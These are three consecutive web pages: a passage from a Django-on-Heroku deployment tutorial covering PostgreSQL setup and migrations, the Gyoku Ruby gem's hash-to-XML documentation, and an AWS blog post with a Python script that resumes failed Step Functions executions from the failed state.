|
NAME¶
nvme — NVM Express
core driver
SYNOPSIS¶
To compile this driver into your kernel, place the following line in your kernel configuration file:
device nvme
Or, to load the driver as a module at boot, place the following line in loader.conf(5):
nvme_load="YES"
Most users will also want to enable nvd(4) or nda(4) to expose NVM Express namespaces as disk devices which can be partitioned. Note that in NVM Express terms, a namespace is roughly equivalent to a SCSI LUN.
DESCRIPTION¶
The
nvme driver provides support for NVM
Express (NVMe) controllers, such as:
- Hardware initialization
- Per-CPU IO queue pairs
- API for registering NVMe namespace consumers such as nvd(4) or nda(4)
- API for submitting NVM commands to namespaces
To assign more than one CPU per I/O queue pair, thereby reducing the number of MSI-X vectors consumed by the device, set the following tunable value in loader.conf(5):
hw.nvme.min_cpus_per_ioq=X
To force legacy interrupts for all
nvme
driver instances, set the following tunable value in
loader.conf(5):
hw.nvme.force_intx=1
Note that use of INTx implies disabling of per-CPU I/O queue pairs.
To control the maximum amount of system RAM in bytes to use as the Host Memory Buffer for capable devices, set the following tunable:
hw.nvme.hmb_max
The default value is 5% of physical memory size per device.
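For example, to cap the Host Memory Buffer at roughly 256 MiB per device, a loader.conf(5) entry along the following lines could be used (the value shown is purely illustrative):
hw.nvme.hmb_max=268435456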
The nvd(4) driver is used to provide a disk
driver to the system by default. The nda(4) driver can
also be used instead. The nvd(4) driver performs better
with smaller transactions and few TRIM commands. It sends all commands
directly to the drive immediately. The nda(4) driver
performs better with larger transactions and also collapses TRIM commands
giving better performance. It can queue commands to the drive; combine
BIO_DELETE commands into a single trip; and use the
CAM I/O scheduler to bias one type of operation over another. To select the
nda(4) driver, set the following tunable value in
loader.conf(5):
hw.nvme.use_nvd=0
When an error occurs, the nvme driver by default prints only the most relevant information about the failed command. To enable dumping of all information about the command, set the following tunable value in loader.conf(5):
hw.nvme.verbose_cmd_dump=1
SYSCTL VARIABLES¶
In addition to the typical pci attachment, the
nvme driver supports attaching to a
ahci(4) device. Intel's Rapid Storage Technology (RST)
hides the nvme device behind the AHCI device due to limitations in Windows.
However, this effectively hides it from the FreeBSD
kernel. To work around this limitation, FreeBSD
detects whether the AHCI device supports RST and whether it is enabled. See
ahci(4) for more details.
SEE ALSO¶
nda(4), nvd(4), pci(4), nvmecontrol(8), disk(9)
HISTORY¶
The
nvme driver first appeared in
FreeBSD 9.2.
AUTHORS¶
|
https://manpages.debian.org/bullseye/freebsd-manpages/nvme.4freebsd.en.html
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
You can upgrade your Cloud Data Fusion instances and batch pipelines to the latest platform and plugin versions to obtain the latest features, bug fixes, and performance improvements. The upgrade process involves instance and pipeline downtime (see Before you start).
Before you start
Plan a scheduled downtime for the upgrade. The process takes up to an hour.
Recommended: Before you upgrade, stop any running pipelines and disable any upstream triggers, such as Cloud Composer triggers. When the upgrade begins, all running pipelines stop. If you upgrade to version 6.3 or above and any pipelines are running beforehand, Cloud Data Fusion doesn't restart them. In earlier versions, Cloud Data Fusion attempts to restart them.
- Install curl.
Upgrading Cloud Data Fusion instances
To upgrade a Cloud Data Fusion instance to a new Cloud Data Fusion version:
In the Cloud Console, open the Instances page.
Click the instance name to open the Instance details page. This page lists instance information, including the instance id, region, current Cloud Data Fusion version, logging and monitoring settings, and any instance labels.
Then perform the upgrade using either the Cloud Console or the gcloud command-line tool:
Console
Click Upgrade for a list of available versions.
Select the version that you prefer.
Click Upgrade.
Click View instance to access the upgraded instance.
Verify that the upgrade was successful by reloading the Instance details page and checking the new version number.
gcloud
Run the following gcloud command from a local terminal or a Cloud Shell session to upgrade to a new Cloud Data Fusion version. Add the --enable_stackdriver_logging, --enable_stackdriver_monitoring, and --labels flags if they apply to your instance.
gcloud beta data-fusion instances update \ --project=PROJECT_ID \ --location=REGION \ --version=NEW_VERSION_NUMBER INSTANCE_ID
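As a hypothetical example, upgrading an instance named my-instance in us-west1 to version 6.4.1 might look like the following (all values are placeholders; substitute your own project, region, version, and instance ID):
gcloud beta data-fusion instances update --project=my-project --location=us-west1 --version=6.4.1 my-instance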
After the command completes, verify that the upgrade was successful: from the Cloud Console, reload the Instance details page and check the new version number.
Upgrading batch pipelines
To upgrade your Cloud Data Fusion batch pipelines to use the latest plugin versions:
Set environment variables.
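A sketch of this step (names in capitals are placeholders, and the exact commands may differ for your setup): export the instance's CDAP endpoint, which the curl commands below rely on, along with an access token if you want to reuse one.
export AUTH_TOKEN=$(gcloud auth print-access-token)
export CDAP_ENDPOINT=$(gcloud beta data-fusion instances describe --project=PROJECT_ID --location=REGION --format="value(apiEndpoint)" INSTANCE_ID)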
Recommended: Backup all pipelines.
Run the following command, then copy the URL output to your browser to trigger a zip file download.
echo $CDAP_ENDPOINT/v3/export/apps
Unzip the downloaded file, then confirm that all pipelines were exported. The pipelines are organized by namespace.
Upgrade pipelines.
Create a variable that points to the pipeline_upgrade.json file that you will create in the next step to save a list of pipelines (insert the PATH to the file).
export PIPELINE_LIST=PATH/pipeline_upgrade.json
Create a list of all of the pipelines for an instance and namespace using the following command. The result is stored in the $PIPELINE_LIST file in JSON format. You can edit the list to remove pipelines that do not need to be upgraded. Set the NAMESPACE_ID field to the namespace where you want the upgrade to happen.
curl -H "Authorization: Bearer $(gcloud auth print-access-token)" -H "Content-Type: application/json" ${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/apps -o $PIPELINE_LIST
Upgrade the pipelines listed in pipeline_upgrade.json. Insert the NAMESPACE_ID of the pipelines to be upgraded. The command displays a list of upgraded pipelines with their upgrade status.
curl -N -H "Authorization: Bearer $(gcloud auth print-access-token)" -H "Content-Type: application/json" ${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/upgrade --data @$PIPELINE_LIST
Upgrading to enable Replication
Replication can be enabled in Cloud Data Fusion environments in version 6.3.0 or above. If you have version 6.2.3, upgrade to 6.3.0, and then enable Replication.
Granting roles for upgraded instances
If you upgrade an instance from Cloud Data Fusion version 6.1.x to version 6.2.0 or above, after the upgrade completes, grant the Cloud Data Fusion Runner role and the Cloud Storage Admin role to the Dataproc service account in your project.
Adding network tags
Network tags are preserved in your compute profiles when you upgrade from Cloud Data Fusion versions 6.2.x and above to a higher version.
If you upgrade from version 6.1.x to version 6.2.0 and above, network tags are not preserved. This might cause your Dataproc cluster to get stuck in provisioning state, especially if your environment has restrictive networking and security policies.
Instead, in each upgraded instance, manually add your network tags to each of the compute profiles it uses.
To add the network tags to a compute profile:
In the Google Cloud Console, open the Cloud Data Fusion Instances page.
Click View Instance.
Click System Admin.
Click the Configuration tab.
Expand the System Compute Profiles box.
Click Create New Profile. A page of provisioners opens.
Click Dataproc.
Enter your desired profile information, including your network tags.
Click Create.
After you add the tags, use the updated profile in your pipeline. The new tags are preserved in future releases.
Available versions for your upgrade
In general, when you upgrade, we recommend using the latest version of Cloud Data Fusion environment so that your instances run in a supported environment for the longest possible time frame. For more information, see the Version support policy. Depending on your original version, upgrades to some versions might not be available. In those cases, you can upgrade to a version that supports upgrades to your desired version.
Cloud Data Fusion supports the following version upgrades:
Troubleshooting
When you upgrade to version 6.4, there is a known issue with the Joiner plugin where you cannot see join conditions. For more information, see the Troubleshooting page.
|
https://cloud.google.com/data-fusion/docs/how-to/upgrading
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
What’s new in Windows Forms in .NET 6.0
Igor
We continue to support and innovate in Windows Forms runtime. Let’s recap what we’ve done in .NET 6.0.
Accessibility improvements and fixes
Making Windows Forms applications more accessible to more users is one of the big goals for the team. Building on the momentum we gained in .NET 5.0 timeframe in this release we delivered further improvements, including but not limited to the following:
- Improved support for assistive technology when using Windows Forms apps. UIA providers enable tools like Narrator and others to interact with the elements of an application. UIA is also often used to create test automation to drive apps. We have now added UIA providers support for the following controls:
CheckedListBox
LinkLabel
Panel
ScrollBar
TabControl
TrackBar
- Improved Narrator announcements in DataGridView, ErrorProvider and ListView column header controls.
- Keyboard tooltips for the TabControl’s TabPage and the TreeView’s TreeNode controls.
- ScrollItem Control Pattern support for
ComboBoxItemAccessibleObject.
- Corrected control types for better support of Text Control Patterns.
- ExpandCollapse Control Pattern support for the DateTimePicker control.
- Invoke Control Pattern support for the UpDownButtons component in DomainUpDown and NumericUpDown controls.
- Improved color contrast in the following controls:
CheckedListBox
DataGridView
Label
PropertyGridView
ToolStripButton
Application bootstrap
In .NET Core 3.0 we started to modernize and rejuvenate Windows Forms. As part of that initiative we changed the default font to Segoe UI, 9f (dotnet/winforms#656), and quickly learned that a great number of things depended on this default font metrics. For example, the designer was no longer a true WYSIWYG, as Visual Studio process is run under .NET Framework 4.7.2 and uses the old default font (Microsoft Sans Serif, 8.25f), and .NET application at runtime uses the new font. This change also made it harder for some customers to migrate their large applications with pixel-perfect layouts. Whilst we had provided migration strategies, applying those across hundreds of forms and controls could be a significant undertaking.
To make it easier to migrate those pixel-perfect apps we introduced a new API (for more details refer to the Application-wide default font post):
void Application.SetDefaultFont(Font font)
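A minimal sketch of how an application might opt back into the old default font with this API, assuming a classic bootstrap and a form named Form1 (the font family and size here are only illustrative):
using System;
using System.Drawing;
using System.Windows.Forms;

static class Program
{
    [STAThread]
    static void Main()
    {
        Application.EnableVisualStyles();
        Application.SetCompatibleTextRenderingDefault(false);
        // Must run before the first window handle is created; this restores
        // the classic .NET Framework default font for pixel-perfect layouts.
        Application.SetDefaultFont(new Font(new FontFamily("Microsoft Sans Serif"), 8.25f));
        Application.Run(new Form1());
    }
}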
However, this API wasn’t sufficient to address the designer’s ability to render forms and controls with the same new font. At the same time, with our sister teams heavily pushing for little code/low ceremony application templates, our
Program.cs and its
Main() method started looking very dated, and we decided to follow the general .NET trend and trim the boilerplate. Please welcome the new Windows Forms application bootstrap:
class Program { [STAThread] static void Main() { ApplicationConfiguration.Initialize(); Application.Run(new Form1()); } }
(C#, .NET 6.0 and above.) And this is how the form looks in the designer, as it would look at runtime:
(We know, the form in the designer still has that Windows 7 look, We’re working on it…)
Please note that Visual Basic handles these application-wide default values differently. In .NET 6.0 Visual Basic introduces a new application event
ApplyApplicationDefaults which allows you to define application-wide settings (e.g.,
HighDpiMode or the default font) in the typical Visual Basic way. The designer support for the default font configured via MSBuild properties is also coming in the near future. For more details head over to the dedicated Visual Basic blog post discussing what’s new in Visual Basic.
Template updates
As mentioned above, we have updated our C# templates in line with related changes in .NET workloads. Windows Forms templates for C# have been updated to support
global using directives, file-scoped namespaces, and nullable reference types. Because a typical Windows Forms app requires a
STAThread attribute and consists of multiple types split across multiple files (e.g.,
Form1.cs and
Form1.Designer.cs) the top-level statements are notably absent from the Windows Forms templates. However, the updated templates do include the application bootstrap code.
More runtime designers
We have completed porting missing designers and designer-related infrastructure that enable building a general-purpose designer (e.g., a report designer). For more details refer to our earlier announcement.
If you think we missed a designer that your application depends on, please let us know at our GitHub repository.
High DPI and scaling fixes
We’ve been working through the high DPI space with the aim to get Windows Forms applications to correctly support PerMonitorV2 mode out of the box. It is a challenging undertaking, and sadly we couldn’t achieve as much as we’d hoped. Still in this release we made some progress, and we now can:
- Create controls in the same DPI awareness as the application
- Correctly scale
ContainerControls and MDI child windows in PerMonitorV2 mode in most scenarios. There are still a few specific scenarios (e.g., anchoring) and controls (e.g.,
MonthCalendar) where the experience remains subpar.
Other notable changes
- New overloads for Control.Invoke() and Control.BeginInvoke() methods that take Action and Func<T> and allow writing more modern and concise code (see the short example after this list).
- New Control.IsAncestorSiteInDesignMode API is complementary to Component.DesignMode, and indicates if one of the ancestors of this control is sited, and that site is in design mode. A dedicated blog post exploring this API is coming later, so stay tuned.
- Windows 11 style default tooltip behavior makes the tooltip remain open when mouse hovers over it, and not disappear automatically. The tooltip can be dismissed by CONTROL or ESCAPE keys.
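As a quick illustration of the new Invoke()/BeginInvoke() overloads mentioned above (label1 is a made-up control name and the snippet is assumed to live inside a Form, for example in a callback running off the UI thread):
// Action overload: marshal a UI update onto the UI thread.
label1.Invoke(() => { label1.Text = "Done"; });

// Action overload, fire-and-forget variant.
label1.BeginInvoke(() => { label1.Text = "Working..."; });

// Func<T> overload: read a value back from the UI thread.
string current = label1.Invoke(() => label1.Text);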
Community contributions
We’d like to call out a few community contributions:
- @paul1956 updated the NotifyIcon.Text character limit to 127 (dotnet/winforms#4363).
- @weltkante enhanced FolderBrowserDialog with InitialDirectory and ClientGuid properties in dotnet/winforms#4645.
- @weltkante added link span to LinkClickedEventArgs (dotnet/winforms#4708), making it easier to migrate RichTextBox functionality targeting RichEdit v3.0 or below that relied on hidden text to render hyperlinks.
- @AraHaan updated the good old MessageBox with two new buttons, Try Again and Continue, and made it possible to show four buttons at the same time (dotnet/winforms#4746):
- @kant2002 helped us make the Windows Forms runtime more ILLink/NativeAOT-friendly by adding ComWrappers and removing redundant RCWs (dotnet/winforms#5174 and dotnet/winforms#4971).
- @kirsan31 provided the ability to anchor minimized MDI children to TopLeft to match Windows MFC behavior in dotnet/winforms#5221.
Bravo!
“We know, the form in the designer still has that Windows XP look, We’re working on it…” – did you mean Windows 7? cause Windows XP never had that look…
Also, please add native dark mode to WinForms applications!
Thank you, fixed. It’s been awhile since I used either.
The team is acutely aware of the desire for the theming of Win32 apps, unfortunately it has dependencies on Windows API, and there are challenges resolving this. We’re actively engaged with our partners in Windows but don’t have an ETA at this time.
To elaborate, I believe the main challenge is that Windows still does not have a documented way to check whether the system is in light or dark mode. Please correct me if I’m wrong about that.
Yes, this is one of the issues.
Congrats to everyone on the WinForms team for a great release! The per monitor high DPI work sounds especially challenging, and it’s totally understandable that it’ll take time to cover all the nuances.
Is there a roadmap ahead for .NET 7? The top feature for me would be to re-enable support for the Data Sources window. Being able to drag and drop classes from that window, and have the controls automatically created and data bound is a huge time saver.
Thank you.
Yes, there is a roadmap, and we plan to make it public in the near future. In the nutshell making high DPI work out of the box is very high on our priority list.
You can keep an eye on the .NET 7.0 milestone (which is a “catch all” at the moment, but we keep reviewing it).
I totally echo what Igor says here, and I’d also encourage you to keep an eye out for a similar post talking about WinForms Designer in VS2022. We’ve added some features around data that I think you might like 😁. Our first VS related blogpost should be published sometime next month.
I don’t know, it would have been nice to have the high DPI fixes in the long-term support release. It was clear at the start of the .NET 6 development cycle that high DPI support in WinForms is a disaster. Once you have monitors with different DPIs each, the default framework windows/forms/controls start to look and behave like total junk.
Is WPF dead? There has been no news from the .NET 5/6 side.
The lack of .NET 6-specific news for WPF does not mean it is dead; a lot of the hard work that went into porting WPF to .NET Core happened back during the .NET Core 3.* release. When Microsoft ported WPF+WinForms to .NET Core, they probably had to leave a lot out for WinForms initially, and they’re now finally getting around to it this release.
Microsoft did recently open source the unit testing suite for WPF:
a lot of the hard work that went into porting WPF to .NET Core
That was done in .NET Core 3. There was no work on this in .NET 5 or .NET 6. You can look at the commits on GitHub; there are no commits for this.
Microsoft did recently open source the unit testing suite for WPF
Officially, that is what they have worked on for the last three years (again, you can read all the commits done over the last three years; it may seem like a big job, but there is less than one real commit a month, so it will be quick). No work on anything else, except in Visual Studio with the new designer and some improvements to IntelliSense for XAML.
Yes it is. Look at the new roadmap for 2022. There is no new stuff coming, no improvements. And meanwhile ALL community PRs which add new code are left completely unreviewed. On some of them the authors have just closed the PR because after more than half a year there was no activity from the “WPF team”.
As I inferred from some talks, there is a shared team for XAML UI. There was plenty of work done for WinUI this year, and many things are still on the backlog. I’m afraid there aren’t enough people to work on WPF.
It would be nice if they would fix bugs first, before adding new stuff.
Visual Inheritance is still a nightmare in the designer, please finally fix that.
good news
Special thanks to Paul M Cohen @ paul 1956
Is it possible that WinForm supports Linux?
There are no official plans to support other OS than Windows.
Windows 11 supports
Use AvalonaUI, it’s very good.
Form Designer in release VS 2022 works much better, it was way too slow I checked it last time some months ago. Thank you.
Is there any special reason why Toolbox shows Framework custom controls disabled for Net 6.0 project? My Net 6.0 app uses some my controls from Net Framework 4.5 dll. When added to the form by the code, the controls seem work just fine, both in design- and run-time. The only problem is that Toolbox shows them grayed out. I see no clear reason for that: once I can manage the controls on the form (copy/paste them, change properties, delete) why can’t they be dragged from Toolbox?
Thank you for the update/blog, but still no mention of DirectX 11 or 12 or (13 for 2022) native support in .NET 6. I still don’t understand why Microsoft are avoiding DirectX in .NET? From a competitive standpoint, we have Vulkan for Java via LWJGL – Khronos.
MDX, XNA, SharpDX, SlimDX are all dead in the water
DirectX still seems to be exclusive to C++ (not C++.NET) … I don’t see how keeping DirectX restricted to a very narrow development base is good for Microsoft?
Cheers, Rob.
You can take a look at TerraFX. That library also has Vulkan if you want it.
|
https://devblogs.microsoft.com/dotnet/whats-new-in-windows-forms-in-net-6-0/
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
Solution for "Why I can’t change font in Label, but in Button I can (Tkinter.ttk)" is given below:
Well, as in topic, why I can’t change font in Label using ttkbootstrap, but in Buttons everything works fine?
And second question, is there some documentation that lists all of the things that I can change in ttk stylesheet? Like eg background color (as in ttkbootstrap is somehow done), because everywhere I searched, was mentioned ’bout background which only changed a “frame” of a button.
Here’s a problematic code:
import tkinter as tk
from ttkbootstrap import Style as StyleBs
import tkinter.ttk as ttk

cfg = {
    "args_label" : {
        "style" : "TLabel",
        "text" : "Label 12345",
    },
    "args_button" : {
        "style" : "TButton",
        "text" : "Button 12345",
    },
}

if __name__ == "__main__" :
    root = tk.Tk()
    style = StyleBs("darkly")
    style.configure('TButton', font=('Times New Roman', 21), foreground = "red")  # foreground is changed, font too
    style.configure('TLabel', font=('Times New Roman', 21), foreground = "red")   # foreground is changed, but font is not
    button = ttk.Button(root, **cfg["args_button"], ).grid(row=0, column = 0)
    label = ttk.Label(root, **cfg["args_label"], ).grid(row=1, column = 0)
    root.mainloop()
The following code worked for me, if you import Style from tkinter instead of ttk.bootstrap you may have an easier time.
I’m not sure why the button and label text, as well the style names were in a dictionary, that’s new on me.
By removing the dictionary and simply placing the desired text and style name inside the button and label builds, it’ll meet your requirements.
from tkinter import Tk, Button, Label, ttk
from tkinter.ttk import Style

root = Tk()

#Assigning variable to Style import
style = ttk.Style()

#Building Button and Label in window
button = ttk.Button(root, text="Button 12345", style="ButtonStyle.TButton").grid(row=0, column = 0)
label = ttk.Label(root, text="Label 12345", style="LabelStyle.TLabel").grid(row=1, column = 0)

#Configuring style to be used by window
style.configure('ButtonStyle.TButton', font=('Times New Roman', 21), foreground='red')
style.configure('LabelStyle.TLabel', font = ('Times New Roman', 21), foreground = 'red')

root.mainloop()
|
https://codeutility.org/why-i-cant-change-font-in-label-but-in-button-i-can-tkinter-ttk/
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
PROBLEM LINK
Contest
Author: Adithi Narayan
Tester: Hareesh
Editorialist: Adithi Narayan
DIFFICULTY
Easy
PREREQUISITES
BFS
PROBLEM
Given a grid where each cell holds a direction [T,L,D,R], find the path from top left to bottom right given that you can either move in the direction specified in the cell or pay a penalty to move in some other direction. (Note that for a cell in the grid the change of direction can only be done once.)
EXPLANATION
We have to reach
(m - 1, n - 1) from
(0, 0) with a path that minimizes the penalty paid. For each cell, you have 2 choices:
- The cell that can be reached by following the direction [say L]
- Three other cells that can be reached via the other directions [say T, D and R]
Thus we have 1 edge of weight
0 and 3 edges of weight
1 [as we incur a penalty]. The problem now reduces to a simple path-finding problem. The default choice of algorithm to solve this would be Dijkstra's, but its time complexity is
O(E + V log V).
However, if we notice the constraints we can see that the edges are binary weighted. We can either follow the directions to reach the cell with cost 0 or change the direction and incur a penalty of 1. So, we can use a more efficient algorithm: 0-1 BFS which uses a deque and has the time complexity of
O(E + V)
In the normal BFS, we do the following changes:
- If the adjacent cell has a cost of 0 [following direction], append it to the left of the queue else append the cell to the right
- Always pop the node at the left
This makes sure that we visit all nodes of a lower cost difference before moving on to the ones with a higher cost difference.
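For reference, a generic 0-1 BFS over an adjacency list looks roughly like the sketch below (independent of this problem's grid encoding); the setter's solution that follows applies the same idea directly on the grid.
from collections import deque

def zero_one_bfs(adj, source):
    # adj[u] is a list of (v, w) pairs with w in {0, 1}
    n = len(adj)
    INF = float('inf')
    dist = [INF] * n
    dist[source] = 0
    dq = deque([source])
    while dq:
        u = dq.popleft()
        for v, w in adj[u]:
            if dist[u] + w < dist[v]:
                dist[v] = dist[u] + w
                # 0-weight edges go to the front, 1-weight edges to the back
                if w == 0:
                    dq.appendleft(v)
                else:
                    dq.append(v)
    return dist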
Setter's Solution
from collections import deque

def minCost(grid, m, n):
    q = deque([[0, 0]])
    dirp = [[-1, 0], [1, 0], [0, -1], [0, 1]]
    dirv = ['T', 'D', 'L', 'R']
    vis = set([])
    res = 0
    while q:
        t = q[0]
        q.popleft()
        ci, cj = t[0] // n, t[0] % n
        if t[0] not in vis:
            res = t[1]
            vis.add(t[0])
        if ci == m - 1 and cj == n - 1:
            return res
        for i, dv in enumerate(dirp):
            x, y = ci + dv[0], cj + dv[1]
            p = x * n + y
            if x < 0 or x >= m or y < 0 or y >= n or (p in vis):
                continue
            q.appendleft([p, t[1]]) if i == dirv.index(grid[ci][cj]) else q.append([p, t[1] + 1])
    return res

m, n = map(int, input().split())
print(minCost([input().split() for i in range(m)], m, n))
|
https://discuss.codechef.com/t/chaat7-editorial/95548
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
Layout callback in custom view classes
@omz, I know you are busy, but I have sort of mentioned this before, just not as a topic on its own. The layout callback method, when you create a custom class that inherits from ui.View, gets called twice when a view loads. I normally have to add another class member that stores the last screen size to avoid a single redundant call to layout. Maybe there is a good reason it's called twice, and a better way to avoid executing the layout code twice.
It's not a big deal, but worth mentioning for 1.6 if it is indeed a redundant call.
Or the old MadonnaView workaround...
import ui

class MadonnaView(ui.View):
    def __init__(self):
        self.first_time = True

    def layout(self):
        if self.first_time:
            self.first_time = False
            return
Thanks @ccc. Was really about pointing that it happens so it could be addressed in 1.6 if it has not been already.
I still use the screen size to check, just in case double calls made in different circumstances.
- MartinPacker
phuket, do you have a simple example that calls layout twice? I tried with the most basic example, and that doesn't happen...
perhaps you are setting the frame after you instantiate (rather than within the constructor)?
- MartinPacker
@JonB, you are right. I wasn't setting the h,w in the init method, but inside the layout method. And maybe this was my misunderstanding about presenting a sheet. I thought I had to do that before to be device independent. If I presented a view using sheet, I had no idea what the resulting size would be on different screen sizes. ( I remember a long time ago, I asked about this here).
I can see with 1.6, you can look at the screen size and determine what you want your view size to be before you call your class to present. Of course, this is only an issue with presenting with a sheet. As you can control the exact size of your sheet view with 1.6, no reason why the size of the view can't be set in the init method.
I hope what I said is correct. My mind is spinning. I did so many tests. But if the view is sized in the init method, no double layout calls. Makes sense.
|
https://forum.omz-software.com/topic/2094/layout-callback-in-custom-view-classes/?
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
Introduction
In the previous episode of the Building Minicli series, we have refactored the initial version of
minicli to support commands defined in classes, with an architecture that uses Command Controllers.
In this new guide, we are going to implement Command Namespaces to organize Controllers and create a standard directory structure and naming conventions that can be leveraged for autoloading commands during application boot. This is a common approach used in web PHP frameworks to facilitate app development and reduce the amount of code necessary when bootstrapping a new application.
Our refactoring will go over the following steps:
- Implement the new CommandNamespace class and refactor CommandRegistry accordingly.
- Outsource command parsing to a new CommandCall class.
- Update the App class to support the changes.
- Update the abstract CommandController class and the concrete controllers in order to support the rest of the work.
- Update and run the minicli script.
This is Part 3 of the Building Minicli series.
Before Getting Started
You'll need
php-cli and Composer to follow this tutorial. You are strongly encouraged to start with the first tutorial in this series and then move through the second part before following this guide.
In case you want a clean base copy of
minicli to follow this tutorial, download version
0.1.2 of erikaheidi/minicli to bootstrap your setup:
wget unzip 0.1.2.zip cd minicli
Then, run Composer to set up autoload. This won't install any package, because
minicli has no dependencies.
composer dump-autoload
Run the application with:
php minicli
or
chmod +x minicli
./minicli
1. Implementing Command Namespaces
In the current application design, each command is an individual Controller. This is a nice way to keep commands organized and under a "contract", instead of having multiple commands all mixed together in a single Controller. This is how the demo controller
HelloController looks like:
<?php namespace App\Command; use Minicli\CommandController; class HelloController extends CommandController { public function run($argv) { $name = isset ($argv[2]) ? $argv[2] : "World"; $this->getApp()->getPrinter()->display("Hello $name!!!"); } }
Our current
CommandRegistry keeps a record of Command Controllers that are manually registered when bootstrapping the application. The
getCallable method is responsible for figuring out what callable needs to be executed by the application:
public function getCallable($command_name) { $controller = $this->getController($command_name); if ($controller instanceof CommandController) { return [ $controller, 'run' ]; } $command = $this->getCommand($command_name); if ($command === null) { throw new \Exception("Command \"$command_name\" not found."); } return $command; }
The problem with this approach is that it can get quite messy and confusing for users if you have many commands that are related to each other but with completely different names.
We want to implement common command entry points to keep related commands organized. Take the example of
docker:
docker image [ import | build | history | ls | pull | prune ... ]
docker container [ build | info | kill | pause | rename | rm ... ]
The
image command serves as a common namespace for all commands that deal with Docker images. The same is valid for
container and other Docker commands.
We'll create a new
CommandNamespace class that will keep a registry of application Controllers under a common name. We'll then modify the
CommandRegistry class to work directly with Command Namespaces, and leave the work of registering and loading Controllers to these new entities. To expand the new design even further while simplifying application bootstrap, we will implement a standard directory structure that will facilitate autoloading Command Namespaces and Controllers into the application.
This is how our new architecture will look like:
app/Command
└── Command1
    ├── DefaultController.php
    ├── OtherController.php
    └── AnyController.php
└── Command2
    └── AnotherController.php
└── Command3
    └── RandomController.php
...
This is an expressive way of organizing commands while also facilitating automatic loading, which reduces the amount of code you have to write in order to include new commands into the application. Each Controller is a new subcommand under the designated Namespace. The name of each subcommand is obtained from the Controller class name, and the DefaultController is automatically used when no subcommand is provided in the command call. A directory structure like that would yield the following command "map":
./minicli command1 [ other | any ]
./minicli command2 another
./minicli command3 random
Let's start by creating the new
CommandNamespace class.
The
CommandNamespace Class
Open a new file at
minicli/lib/CommandNamespace using your code editor of choice.
lib/CommandNamespace.php
The
CommandNamespace class will have a name and an array containing Controllers mapped into subcommands.
The
loadControllers method will leverage the standard directory structure and naming conventions we defined to create a map of all Controllers under that namespace.
Copy the following code to your
CommandNamespace class:
<?php namespace Minicli; class CommandNamespace { protected $name; protected $controllers = []; public function __construct($name) { $this->name = $name; } public function getName() { return $this->name; } public function loadControllers($commands_path) { foreach (glob($commands_path . '/' . $this->getName() . '/*Controller.php') as $controller_file) { $this->loadCommandMap($controller_file); } return $this->getControllers(); } public function getControllers() { return $this->controllers; } public function getController($command_name) { return isset($this->controllers[$command_name]) ? $this->controllers[$command_name] : null; } protected function loadCommandMap($controller_file) { $filename = basename($controller_file); $controller_class = str_replace('.php', '', $filename); $command_name = strtolower(str_replace('Controller', '', $controller_class)); $full_class_name = sprintf("App\\Command\\%s\\%s", $this->getName(), $controller_class); /** @var CommandController $controller */ $controller = new $full_class_name(); $this->controllers[$command_name] = $controller; } }
Save the file when you're done.
The
CommandRegistry class
Open the existing
CommandRegistry class on your editor:
lib/CommandRegistry.php
The
CommandRegistry class will now outsource to Command Namespaces the work of registering and locating Controllers. Because the application implements a standard directory structure and naming conventions, we can locate all Command Namespaces currently defined - this is done in the
autoloadNamespaces method.
To keep compatibility with single commands registered via anonymous functions, which can be very handy and facilitate single-command apps, we will keep a
default_registry array to register commands that way, too. Another important change is that we now have a
getCallableController in addition to
getCallable. The Application will decide which one to use, and when.
This is how the updated
CommandRegistry class looks like:
<?php namespace Minicli; class CommandRegistry { protected $commands_path; protected $namespaces = []; protected $default_registry = []; public function __construct($commands_path) { $this->commands_path = $commands_path; $this->autoloadNamespaces(); } public function autoloadNamespaces() { foreach (glob($this->getCommandsPath() . '/*', GLOB_ONLYDIR) as $namespace_path) { $this->registerNamespace(basename($namespace_path)); } } public function registerNamespace($command_namespace) { $namespace = new CommandNamespace($command_namespace); $namespace->loadControllers($this->getCommandsPath()); $this->namespaces[strtolower($command_namespace)] = $namespace; } public function getNamespace($command) { return isset($this->namespaces[$command]) ? $this->namespaces[$command] : null; } public function getCommandsPath() { return $this->commands_path; } public function registerCommand($name, $callable) { $this->default_registry[$name] = $callable; } public function getCommand($command) { return isset($this->default_registry[$command]) ? $this->default_registry[$command] : null; } public function getCallableController($command, $subcommand = null) { $namespace = $this->getNamespace($command); if ($namespace !== null) { return $namespace->getController($subcommand); } return null; } public function getCallable($command) { $single_command = $this->getCommand($command); if ($single_command === null) { throw new \Exception(sprintf("Command \"%s\" not found.", $command)); } return $single_command; } }
Save the file when you're done updating its content.
2. Outsourcing Command Parsing to the
CommandCall Class
To facilitate parsing commands, subcommands and other parameters, we'll create a new class named
CommandCall.
Open a new file:
lib/CommandCall.php
The
CommandCall class works as a simple abstraction to the command call and provides a way to parse named parameters, such as
user=name.
It is handy because it keeps these values in a typed object that gives us more control over what is forwarded to the commands controllers. It can be expanded in the future for more complex parsing.
The
CommandCall class
Copy the following contents to your new
CommandCall class:
<?php namespace Minicli; class CommandCall { public $command; public $subcommand; public $args = []; public $params = []; public function __construct(array $argv) { $this->args = $argv; $this->command = isset($argv[1]) ? $argv[1] : null; $this->subcommand = isset($argv[2]) ? $argv[2] : 'default'; $this->loadParams($argv); } protected function loadParams(array $args) { foreach ($args as $arg) { $pair = explode('=', $arg); if (count($pair) == 2) { $this->params[$pair[0]] = $pair[1]; } } } public function hasParam($param) { return isset($this->params[$param]); } public function getParam($param) { return $this->hasParam($param) ? $this->params[$param] : null; } }
Save the file when you're done.
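As a quick illustration (this throwaway script is not part of the tutorial files), the parser splits argv into command, subcommand and named parameters like this when run from the project root:
<?php
require __DIR__ . '/vendor/autoload.php';

use Minicli\CommandCall;

// Simulate "./minicli hello name user=erika"
$input = new CommandCall(['minicli', 'hello', 'name', 'user=erika']);

echo $input->command . PHP_EOL;          // hello
echo $input->subcommand . PHP_EOL;       // name
echo $input->getParam('user') . PHP_EOL; // erika
var_dump($input->hasParam('missing'));   // bool(false)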
3. Updating the
App Class
To accommodate the changes in the
CommandRegistry, we'll need to also update the
App class. Open the file with:
lib/App.php
The
runCommand method now will first call the
getCallableController method in the
CommandRegistry class; if a controller is found, it will execute three distinct methods in this order:
boot,
